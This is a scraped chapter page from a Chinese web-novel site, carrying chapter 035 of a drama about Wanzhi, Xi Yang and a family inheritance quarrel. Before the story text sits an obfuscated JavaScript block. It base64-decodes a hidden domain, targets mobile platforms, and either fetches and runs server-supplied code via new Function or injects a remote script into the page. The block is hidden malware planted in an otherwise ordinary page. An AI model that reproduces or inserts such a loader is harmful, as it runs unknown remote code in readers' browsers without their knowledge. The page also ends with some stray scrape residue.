98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
下一章

035横生(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

一同前来的兰瑟拿出文件:“我作为兰德先生唯一的儿子,代表兰德家族撤销任何申诉。”

洛佩兹欲尽早结束:“遗产分割也走正常流程,孩子们成年之后……”

焦点转移,晚栀兀自神游,回想进来时的情景,被拦在外面的奚扬从从容容、双手摊开,身影交错时她听到若有若无的气音:“See?”

“宋凌菲认罪了。”许褚进来,给正粉饰太平的收尾一记清脆的耳光。

她一直觉得宋凌菲是个精致的利己主义者,任何危及自身的必将清除。

直到离开,晚栀都百思不得其解。

“晚栀我的乖孩子。”朦胧间被温暖的怀抱包裹,“回去好好睡一觉。”

她用力回抱:“嗯。”

洛佩兹松开她,朝兰洛兰瑟道:“你们聊聊,我在车上等你们。”

几人静默半晌后倒是兰瑟先笑了:“对不起。”爽朗的笑一如既往。

“嗯?”室外的日头正高,晚栀用手遮住刺眼的光。

兰洛一边解释道:“是兰德家族的一位搞不清楚状况的长辈挑起来的。他一直对遗产分割有意见。”

“没事,我一开始接近你也不怀好意。”晚栀用手挡住刺眼的阳光。

冬日的太阳偶尔也能晒得人焦灼。

“还是要对不起。”兰洛示意她树荫底下的长椅,“那时候无视了你的求救。”

晚栀一愣:“……哦。”提起她一直努力遗忘的那几年,她缓缓摇头:“不碍事儿。”

原来还是有过很多次求救的。

尽管关系尴尬,但兰瑟很喜欢她这几面之缘的姐姐,儿时最后一次见面,晚栀出于对洛佩兹此前婚礼上的意外,对他们都避而远之。

最后变成一出略血腥的闹剧:

“姐姐姐姐,你别不开心。”磕伤的乳牙被强硬地摘下,“你喜欢的虎牙,送给你。”

所有能解决问题的人都想过一遍,给他们写信,她真的也走投无路了吧。

很久一段时间,兰洛出于对弟弟的爱护,怕晚栀会教坏兰瑟,便对那些求救的信件置之不理。

此去经年,没有必要了。

不过是个荒谬的环,又从何说起,没必要的。

远处走来一位少年,三人看过去,兰洛帅气地跟她道别:“拜拜。”

晚栀坐在长椅上身形未动,朝他们挥手:“再见。”

奚扬走到她面前时,几米开外的兰瑟还不忘回头,固执的大眼睛有着稚气未脱的莽撞:“下次见了。”

她正笑着点头:“嗯。”

“怎么不在大厅等?”奚扬递给她一瓶饮料,原本巧笑倩兮的少女抬头,眯眼看着逆光下的少年,拧开瓶子倒头就喝,天鹅般的长颈扬起,已然另一幅洒脱神色。

“像不像你?”眼神里的沉静像是极度疲惫之后,颓然的清醒。

奚扬坐在她旁边轻抚她的眼睑,这一次那双漂亮的眼睛没有闭上。

他放下手没回答,静静听后面的话。

果味饮料下,少女的声息都变得清幽:“无所不用其极,又徒劳无功。”

他们彼此足够了解,所以知道怎么有力地刺伤对方。

奚扬终于看过来,目光沉静,犹如一潭死水。

不对,幽谭之下总有暗流涌动:“什么时候听到的?”

晚栀低笑,很巧妙的问答,直接跳过封闭式问题。

“这不过是场游戏。”

It&#039;s just a game.Come on.

医院的原话被复述,他没否认,却像复盘的围棋手:“那怎么还跟我回家。”

她看着川流不息的马路:“看你有多坏。”

“我?”奚扬靠在长椅上舒展身体:“先不说你算在我头上这事儿多离谱,我爷爷也没做什么。”

“只是把我们摆在一起,然后好好观赏这场游戏?”她说到后面,连嘲讽都惨淡不少。

垂涎遗产分割的兰德家族长辈,风声鹤唳的幸存者们,维系集团利益的管理人……还有哪些没想到?

哦,最后这个结局,她又是为什么?

“我知道你想问宋凌菲。”奚扬不知为何比往日多话起来,“对外你‘进去’那么久,肯定会有很多猜测,我想对于‘输给你’这件事,她是不容许发生的,包括所谓的磊落。”

他头头是道分析的神态,冷漠得可怕:“心虚作祟,而已。”

“你看,我什么都没做。”

看,他还什么都没做。

晚栀未置一词,内心仍震动于宋凌菲选择“磊落认罪”的可能中。

尽管家族三分之一从政的宋家,估计不会让宋凌菲有事。

“每个人收到欲望驱使,我爷爷什么也没做。”

她用指甲抠着饮料盖子:“你爷爷开始的这场‘游戏’,不是吗?”

奚扬周身泛起防备的疏离:“所以你要算到我头上?”

“这场游戏里,你是什么角色呢?”晚栀如孩童般天真地歪头,“救世主?”

一时间,悠闲看客变成戏中人。

“知道你为什么这么了解吗?”他的眼神有点阴郁,“我们是同类。”

奚扬也像对待孩童那样抚摸她的额头:“怕不怕?”

“没什么好怕的。”额头抚慰的温暖,像是真的回到小时候,她却瞬间亮起浑身的刺,“说不定连我美国机票都准备好了呢,我应该感恩。”

晚栀自顾自喝饮料,瓶子快见底也浑然未觉。

“不我应该问,痛快吗?”

正欲否认的晚栀愣在他双眼的洞悉里,奚扬双手捧着她的脸,“装得很辛苦吧?”

内心的恐惧与其说是对生命消逝的恐惧,倒不如说是对她自己,从亲手报复中获取愉悦和享受的自己的恐惧。

马路正堵车,到处都是烦躁的喇叭声,奚扬看着被迫停滞的车流道:“人命这东西,一旦沾上就是不归路。”

晚栀看过去,竟然有种阅尽人间百态的沧桑。

如果忽略他眼底的睥睨众生的话。

原来是将一切玩弄于鼓掌之中的野兽啊。

“要说虚伪谁比得过你啊。”晚栀脸上的笑甜美到恶毒,“你为什么能这么养尊处优?不管你有多厌恶,你所拥有的不过都仰仗于你的家族,”

欲走的身影被强硬拉住,她悠悠转身,气焰未散,眼里的戏谑灼人:“你当然还可以有很多招,以你现在的势力。”

尽管双眼通红,他勾起嘴角松手,又恢复往常独善其身的矜贵样儿:“我只想说,你妈妈到底知不知道,你不好奇?”

听到那不能提的两个字短暂地瞳孔收缩,晚栀拍了拍衣袖:“你以为你是谁啊。”冷漠的语气灼人,她快意地看着黑眸里涌动的暗流变成一潭死水。

是与不是很重要吗?她都不会放过自己的啊。

她是孤独的,和奚扬一样孤独,所以会彼此吸引。

不过狼与狈。

——————————————————————

当架空看吧', '吧')

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间